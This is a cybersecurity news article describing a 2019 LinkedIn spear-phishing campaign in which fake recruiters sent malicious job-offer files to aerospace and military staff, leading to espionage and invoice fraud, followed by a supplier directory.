LinkedIn ‘Job Offers’ Targeted Aerospace & Military Personnel

Uploaded on 2020-07-01 in TECHNOLOGY--Hackers, JOBS-Careers, FREE TO VIEW, TECHNOLOGY-Key Areas-Social Media

A recent malware campaign targeted victims at European and Middle East aerospace and military companies, using LinkedIn spear-phishing messages posing as recruiters in order to steal information and money from the military and aerospace executives.

Attackers are impersonating human resource employees from Collins Aerospace and General Dynamics in a spear-phishing campaign leveraging LinkedIn’s messaging service. Targets are sent phony job offers that include malicious documents designed to fetch data-exfiltrating malware.

To trick prospective victims, the attackers created fraudulent LinkedIn accounts impersonating human resources or hiring managers from various aerospace and defense companies, including Collins Aerospace and General Dynamic, ESET explains. Then they used LinkedIn’s messaging feature to reach out to targeted employees and offer an employment opportunity, in hopes of getting them to open a malicious file sent either directly through LinkedIn or via a combination of email and OneDrive.

Researchers believe the primary goal of the attacks, which occurred from September to December 2019, was espionage and some suggested that they may also have financial motives.

Victims were first sent a job offer in a LinkedIn message from a “well-known company in a relevant sector.” These included Collins Aerospace, a major US supplier of aerospace and defense products, and General Dynamics, another large US-based corporation. 

The “job offer” file was a password-protected RAR archive containing a LNK file. Once opened, the messages contained a seemingly-innocuous PDF document that showed salary information related to the fake job. However, the PDF was a decoy:

Behind the scenes, a Command Prompt utility (a command-line interface program used to execute commands in Windows) was executed to create a scheduled task. 

Attackers are making use of a Windows component called Task Scheduler, which provides the ability to schedule the launch of programs at pre-defined times. The scheduled task was set to execute a remote XSL script. XSL, or Extensible Stylesheet Language files, are commonly used for processing data within XML files. The XSL script downloaded base64-encoded payloads, which were then decoded by a legitimate Windows utility, called Certutil. This is used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates. Another Windows command line utility program was then used, called rundll32 (used for loading DLLs), to finally download and run a PowerShell DLL. 

The abuse of these two legitimate, preinstalled Windows utilities by attackers is a common method called ‘living off the land’ used as a way to covertly carry out activity under the guise of regular activity.

Since the logging of executed PowerShell commands is disabled by default, researchers couldn’t retrieve the commands used by the malware. However, they found that the attackers queried the AD (Active Directory) server to obtain a list of employees, including administrator accounts, and subsequently performed password brute-force attacks on the administrator accounts.

In one situation, attackers found communication between the victim and a customer regarding an unresolved invoice. The attackers followed up in the conversation, purporting to be the victim, and urged the customer to pay the invoice to a bad actor controlled bank account. Paul Rockwell, head of trust and safety with LinkedIn, said that the creation of a fake account or fraudulent activity with an intent to mislead or lie to LinkedIn members “is a violation of our terms of service.”

Researchers warn to keep an eye out for the staples of spear-phishing emails, such as suspicious attachments and spelling errors, that can even be found on LinkedIn.

In the case of one scam, the adversaries impersonated one of their targets, sending an email with a fake invoice to one of the victim’s customers, hoping to persuade the recipient to route a bank payment to the attackers’ account. The fraud was exposed when the customer emailed back the legitimate target company instead of the attackers.

LinkedIn:    Threatpost:       SC Magazine:      Infosecurity

You Might Also Read:

Reputational Damage & The Human Factor In Social Media:

 

« Webinar: How To Protect All AWS Services & Surfaces
Artificial Intelligence – A Brief History »

Infosecurity Europe
CyberSecurity Jobsite
Perimeter 81
Cyrin

Real Attacks. Real Tools. Real Scenarios.
Schedule a demo

Sign Up: Cyber Security Intelligence Newsletter

Directory of Suppliers

CSI Consulting Services

CSI Consulting Services

Get Advice From The Experts: * Training * Penetration Testing * Data Governance * GDPR Compliance. Connecting you to the best in the business.

The PC Support Group

The PC Support Group

A partnership with The PC Support Group delivers improved productivity, reduced costs and protects your business through exceptional IT, telecoms and cybersecurity services.

Resecurity

Resecurity

Resecurity is a cybersecurity company that delivers a unified platform for endpoint protection, risk management, and cyber threat intelligence.

Clayden Law

Clayden Law

Clayden Law advise global businesses that buy and sell technology products and services. We are experts in information technology, data privacy and cybersecurity law.

IT Governance

IT Governance

IT Governance is a leading global provider of information security solutions. Download our free guide and find out how ISO 27001 can help protect your organisation's information.

TestFort

TestFort

TestFort QA Lab is a specialized software testing company offering independent quality assurance and software testing services.

Snyk

Snyk

Snyk is the leader in developer security. We empower the world’s developers to build secure applications and equip security teams to meet the demands of the digital world.

Excellium Services

Excellium Services

Excellium’s Professional Services team combines expertise and experience that complements your in-house security resources.

Scientific Cyber Security Association (SCSA)

Scientific Cyber Security Association (SCSA)

The main goal of Scientific Cyber Security Association is the development of scientific and practical directions of cyber security.

JobStreet.com

JobStreet.com

JobStreet is one of Asia’s leading online employment marketplaces in Malaysia, Philippines, Singapore, Indonesia and Vietnam.

Singular Security

Singular Security

Singular Security help public and private organizations minimize cybersecurity risk and pass their IT compliance audit.

Absa Cybersecurity Academy

Absa Cybersecurity Academy

Absa Cybersecurity Academy is an initiative aimed at empowering marginalised South African youths to become certified cybersecurity specialists.

CoursesOnline

CoursesOnline

CoursesOnline.co.uk is a database listing IT security courses from providers across the UK.

Outseer

Outseer

Outseer is a leading technology company in the fight against payments fraud. Outseer reliably determines authentic customers from fraudulent behavior.

Stronghold Cyber Security

Stronghold Cyber Security

Stronghold Cyber Security is a consulting company that specializes in NIST 800, the Cybersecurity Framework and the Cybersecurity Maturity Model Certification.

Airiam

Airiam

Airiam provides cybersecurity, managed IT, consulting, incident response, and digital transformation services so you can focus on what matters most.

IPKeys Cyber Partners

IPKeys Cyber Partners

IPKeys Cyber Partners, together with the IPKeys Power Partners unit, provide Cyber Security and CIP Compliance for utilities, grid operators and public safety organization across the USA.

Protexxa

Protexxa

Protexxa is a B2B SaaS cybersecurity platform that leverages Artificial Intelligence to rapidly identify, evaluate, predict, and resolve cyber issues for employees.

SoftForum

SoftForum

SoftForum is a company specializing in next-generation information security solutions in the Quantum-Resistant-Cryptography (PQC) field.

Avatar Managed Services

Avatar Managed Services

Avatar offers proven, process driven IT support to companies who want to utilize their technology to their best advantage.

Soteria LLC

Soteria LLC

Soteria LLC are a client-focused organization providing expert advisory, consulting services, and tailored solutions to prevent, detect, and respond to cybersecurity incidents.